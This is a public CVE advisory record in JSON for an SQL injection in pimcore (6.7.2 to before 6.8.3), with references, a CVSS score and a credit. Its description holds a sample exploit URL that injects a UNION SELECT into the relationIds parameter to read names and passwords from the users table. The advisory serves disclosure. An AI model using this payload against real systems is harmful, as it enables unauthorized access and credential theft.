cvelist/2020/7xxx/CVE-2020-7759.json

96 lines
3.4 KiB
JSON
Raw Normal View History

2020-01-21 23:01:08 +00:00
{
"data_type": "CVE",
"data_format": "MITRE",
"data_version": "4.0",
"CVE_data_meta": {
2020-10-30 12:53:42 +02:00
"ASSIGNER": "report@snyk.io",
"DATE_PUBLIC": "2020-10-30T10:53:39.750312Z",
2020-01-21 23:01:08 +00:00
"ID": "CVE-2020-7759",
2020-10-30 12:53:42 +02:00
"STATE": "PUBLIC",
"TITLE": "SQL Injection"
},
"affects": {
"vendor": {
"vendor_data": [
{
"product": {
"product_data": [
{
"product_name": "pimcore/pimcore",
"version": {
"version_data": [
{
"version_affected": ">=",
"version_value": "6.7.2"
},
{
"version_affected": "<",
"version_value": "6.8.3"
}
]
}
}
]
},
"vendor_name": "n/a"
}
]
}
},
"problemtype": {
"problemtype_data": [
{
"description": [
{
"lang": "eng",
"value": "SQL Injection"
}
]
}
]
},
"references": {
"reference_data": [
{
2020-11-02 21:01:48 +00:00
"refsource": "MISC",
"url": "https://snyk.io/vuln/SNYK-PHP-PIMCOREPIMCORE-1017405",
"name": "https://snyk.io/vuln/SNYK-PHP-PIMCOREPIMCORE-1017405"
2020-10-30 12:53:42 +02:00
},
{
2020-11-02 21:01:48 +00:00
"refsource": "MISC",
"url": "https://github.com/pimcore/pimcore/pull/7315",
"name": "https://github.com/pimcore/pimcore/pull/7315"
2020-10-30 12:53:42 +02:00
}
]
2020-01-21 23:01:08 +00:00
},
"description": {
"description_data": [
{
"lang": "eng",
2020-11-02 21:01:48 +00:00
"value": "The package pimcore/pimcore from 6.7.2 and before 6.8.3 are vulnerable to SQL Injection in data classification functionality in ClassificationstoreController. This can be exploited by sending a specifically-crafted input in the relationIds parameter as demonstrated by the following request: http://vulnerable.pimcore.example/admin/classificationstore/relations?relationIds=[{\"keyId\"%3a\"''\",\"groupId\"%3a\"'asd'))+or+1%3d1+union+(select+1,2,3,4,5,6,name,8,password,'',11,12,'',14+from+users)+--+\"}]"
2020-01-21 23:01:08 +00:00
}
]
2020-10-30 12:53:42 +02:00
},
"impact": {
"cvss": {
"version": "3.1",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:N/A:H/E:P/RL:O/RC:C",
"baseScore": 6.5,
"baseSeverity": "MEDIUM",
"attackVector": "NETWORK",
"attackComplexity": "LOW",
"privilegesRequired": "HIGH",
"userInteraction": "NONE",
"scope": "UNCHANGED",
"confidentialityImpact": "HIGH",
"integrityImpact": "NONE",
"availabilityImpact": "HIGH"
}
},
"credit": [
{
"lang": "eng",
"value": "Daniele Scanu"
}
]
2020-01-21 23:01:08 +00:00
}